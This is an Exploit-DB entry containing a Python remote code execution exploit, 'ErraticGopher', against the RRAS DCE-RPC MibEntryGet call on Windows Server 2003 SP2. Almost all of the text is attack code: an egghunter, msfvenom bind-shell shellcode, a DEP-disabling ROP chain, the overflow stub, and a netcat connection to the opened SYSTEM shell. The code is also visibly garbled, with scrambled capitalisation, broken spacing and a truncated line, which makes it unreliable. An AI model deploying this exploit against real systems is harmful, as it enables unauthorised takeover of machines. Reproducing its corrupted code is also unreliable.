Edb-id: 41929 |
Author: vportal |
Published: 2017-04-25 |
CVE: N/A |
Type: Remote |
Platform: Windows |
Aliases: Erraticgopher |
Advisory/source: N/A |
Tags: N/A |
e-db verified: |
Exploit: Download/ View Raw |
vulnerable App: N/A |
#!/usr/bin/env python#-*-coding:utf-8-*-####################################################################### ############ by Victor Portal (vportal) for educational porpouse only ############################################## ##################################### This exploit is the Python version of the erraticgopher exploit probably # # With some modifications. Erraticgopher exploits a Memory Corruption # # (seems to bes a Heap Overflow) in the Windows Dce-rpc call Mibentr Yget. # # Because The Magic bytes, the application redirects the execution to the # # Iprtrmgr.dll library, where a InStr Uction REPS MOVS (0x641194f5) Copy # # All Te injected stubs from the heap to the stack, overwritten a return # # Address as well as the "SEH handler stored in the" Stack, being possible # to control the execution flow to Disable DEP and jump to the Shellcode # as SYSTEM user. ################################################################################### #The exploit only works if T Arget have the RRAS service enabled#tested on Windows Server 2003 SP2 import structimport sysimport timeimport os from thre Ading Import Thread from impacket import smbfrom impacket import uuidfrom impacket Imp ORT dcerpcfrom IMPACKET.DCERPC.V5 Import Transport target = sys.argv[1] print ' [-]initiating connection ' t Rans = transport. Dcerpctransportfactory (' ncacn_np:%s[\\pipe\\browser] '% target) trans.connect () print ' [-]connected to Ncacn_np:%s[\\ Pipe\\browser] '% Targetdce = trans. Dcerpc_class (trans) #RRAS Dce-rpc calldce.bind (uuid.uuidtup_to_bin (' 8f09f000-b7ed-11ce-bbd2-00001a181cad ', ' 0.0 ') )) Egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a" Egghunter + = "\x74\xef\xb8\x77\x30\x30 \x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7 "#msfvenom-a x86--platform windows-p windows/shell_bind_tcp lport=4444-b "\x00"-f pythonbuf = "buf + =" \xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33 "buf + =" \xc9\xb1\x53\x83\xc2 \X04\X31\X42\X0E\X03\X7E\XBF\XFC "buf + =" \xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8 "buf + =" \xd4\x8a\x93 \x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f "buf + =" \x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35 "buf + =" \x04 \x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43 "buf + =" \xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f " BUF + = "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" buf + = "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\ Xc3\xa6 "buf + =" \x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff "buf + =" \x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\ Xda\xad\xc0\xd2 "buf + =" \x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9 "buf + =" \xb2\x98\x03\x82\x5f\xcc\x39\ Xc9\x37\x21\x70\xf1\xc7 "buf + =" \x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51 "buf + =" \xde\x43\x44\x5a\x1f\ x4a\x83\x0e\x4f\xe4\x22\x2f\x04 "buf + =" \xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\X68\xa9 "buf + =" \xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23 "buf + =" \x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\ xbb\xc5\x51\x98 "buf + =" \x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97 "buf + =" \x39\x26\x1a\xbf\x2e\xb1\xd0\ X2e\x1d\x23\xe4\x7a\xf5 "buf + =" \xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5 "buf + =" \xc5\x61\x24\x04\x93\ X4a\xec\xd3\x60\x54\xed\x96\xdd "buf + =" \x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b "buf + =" \xf1\x53\xd8\ x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b "buf + =" \x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9 "buf + =" \x6f\ x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90 "buf + =" \x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8 "buf + = "\xc4\x25\x3d\xe9" #NX disable routine for Windows Server 2003 sp2rop = "\x30\xdb\xc0\x71" #push esp, pop ebp, Retn ws_ 32.dllrop + = "\x45" *16rop + = "\xe9\x77\xc1\x77" #push esp, pop ebp, retn 4 gdi32.dllrop + = "\x5d\x7a\x81\x7c" #ret 20rop + = "\x71\x42\x38\x77" #jmp esprop + = "\xf6\xe7\xbd\x77" #add esp,2c; Retn Msvcrt.dllrop + = "\x90" * + egghunter + "\x90" *42rop + = "\x17\xf5\x83\x7c" #Disable NX routinerop + = "\x90" = "\x2" 1\x00\x00\x00\x10\x27\x00\x00\x30\x07\x00\x00\x00\x40\x51\x06\x04\x00\x00\x00\x00\x85\x57\x01\x30\x07\x00\x00\ X08\x00\x00\x00 "#Magic bytesstub + =" \x41 "*20 + ROP +" \XCC "*100 +" w00tw00t "+ buf +" \x42 "* (1313-20-len (ROP) -100-8-len ( BUF)) Stub + = "\x12" #Magic bytestub + = "\x46" *522stub + = "\x04\x00\x00\x00\x00\x00\x00\x00" #Magic bytes Dce.call (0x1d, S Tub) #0x1d Mibentryget (vulnerable function) print "[-]exploit sent to target successfully ..." print "Waiting for Shell: ." Time.sleep (5) Os.system ("NC" + target + "4444")
Microsoft Windows 2003 SP2-' Erraticgopher ' SMB Remote Code execution